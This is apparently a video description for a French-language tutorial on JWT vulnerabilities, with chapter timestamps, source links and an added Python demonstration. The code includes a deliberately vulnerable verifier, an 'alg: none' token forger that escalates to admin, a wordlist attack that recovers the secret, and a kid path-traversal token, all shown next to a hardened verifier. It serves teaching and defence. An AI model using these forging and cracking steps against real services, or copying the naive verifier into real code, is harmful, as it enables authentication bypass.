Today, a comprehensive video on JSON Web Token (JWT) vulnerabilities. If you're not familiar with JWTs, don't worry, I explain everything from A to Z in the video: what they are, the cryptography behind them, and known vulnerabilities such as JWT header injection leading to path traversal through the kid header!
00:00 - Intro
00:18 - What is a JWT? What is JSON?
03:08 - How are JWTs signed? Overview of crypto algorithms
06:49 - Why attackers are interested in JWTs
07:00 - Attack via arbitrary signature acceptance
08:06 - "alg": "none" header attack
09:19 - Brute-force secret key attack
12:16 - JWT header injection, differences between JWS and JWE
16:03 - Lab: JWT authentication bypass via kid header path traversal
18:07 - Impacts
19:18 - Remediations
20:45 - Outro!
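The attacks listed in the chapters above, worked through in code. This is an added example written for this description; it is not code from the video or from any of the linked sources. It uses only the Python standard library and constructed sample data: the secret `secret1`, the wordlist, the `KEYSTORE` mapping and every function name are assumptions made for the demonstration. `verify_naive` is the vulnerable verifier (it trusts the attacker-controlled `alg` header, so `alg: none` skips the signature check), `verify_strict` is the hardened one (algorithm pinned server-side, `none` rejected, `kid` used only as an allowlist lookup rather than a file path, constant-time comparison), `forge_none` is the attacker's step, `brute_force_secret` is the offline dictionary attack, and a token whose `kid` is `../../../../dev/null` signed with an empty key shows why `kid` must never be turned into a path.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed sample material for the demonstration (not real secrets, assumed names).
SECRET = b"secret1"
WORDLIST = ["password", "123456", "secret1", "changeme"]
# Hypothetical server-side keystore: kid -> key. Keys come from here, never from a file path.
KEYSTORE = {"k1": SECRET}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode_part(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, secret: bytes, kid: str = "k1") -> str:
    """Issue a JWS: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    signing_input = _encode_part({"alg": "HS256", "typ": "JWT", "kid": kid}) + "." + _encode_part(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_naive(token: str, secret: bytes) -> Optional[dict]:
    """VULNERABLE: honours the attacker-controlled 'alg' header, so 'none' skips the signature."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))  # signature never checked
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if hmac.compare_digest(expected, b64url_decode(s)):
        return json.loads(b64url_decode(p))
    return None


def resolve_key(kid: object) -> Optional[bytes]:
    """Hardened kid handling: kid is only a dictionary key. Building a path from it
    (e.g. open('keys/' + kid)) is what lets ../../dev/null become an empty signing key."""
    if not isinstance(kid, str):
        return None
    return KEYSTORE.get(kid)


def verify_strict(token: str) -> Optional[dict]:
    """Hardened verifier: algorithm pinned, 'none' rejected, allowlisted kid, constant-time compare."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    try:
        header = json.loads(b64url_decode(h))
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None
    key = resolve_key(header.get("kid"))
    if key is None:
        return None
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


def forge_none(token: str) -> str:
    """Attacker step for the none attack: set alg=none, escalate a claim, drop the signature."""
    h, p, _ = token.split(".")
    header = json.loads(b64url_decode(h))
    header["alg"] = "none"
    payload = json.loads(b64url_decode(p))
    payload["role"] = "admin"
    return _encode_part(header) + "." + _encode_part(payload) + "."


def brute_force_secret(token: str, wordlist: list) -> Optional[str]:
    """Offline dictionary attack on HS256: a captured valid token is its own oracle."""
    h, p, s = token.split(".")
    sig = b64url_decode(s)
    for candidate in wordlist:
        guess = hmac.new(candidate.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(guess, sig):
            return candidate
    return None


def demo() -> dict:
    """Run every scenario and return the outcomes for inspection."""
    token = sign_hs256({"sub": "alice", "role": "user"}, SECRET)
    forged = forge_none(token)
    # kid traversal: token signed with an empty key, as if the server had read /dev/null.
    traversal = sign_hs256({"sub": "alice", "role": "admin"}, b"", kid="../../../../dev/null")
    return {
        "genuine_strict": verify_strict(token),
        "forged_naive": verify_naive(forged, SECRET),
        "forged_strict": verify_strict(forged),
        "traversal_strict": verify_strict(traversal),
        "recovered_secret": brute_force_secret(token, WORDLIST),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The forged token is accepted by `verify_naive` with `role: admin` and rejected by `verify_strict`; the traversal token is rejected because `../../../../dev/null` is not a key id in the allowlist; the weak secret falls to the wordlist in a handful of HMAC computations, which is why the remediation chapter's advice on long random secrets (or asymmetric signing) matters as much as pinning the algorithm.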
Thumbnail: @gurvanseveno3498
=[ Social ]=
→ Twitter: @fransosiche
=[ Sources ]=
→ portswigger.net/web-security/jwt
→ book.hacktricks.xyz/pentestin...
→ supertokens.com/blog/what-is-jwt
→ grafikart.fr/tutoriels/json-w...
→ Laluka's Twitter: thelaluka?s=21&t=...
#cybersecurity #JWT #JsonWebToken #vulnerability #web #hacking #pentest #fr
13 Jul 2024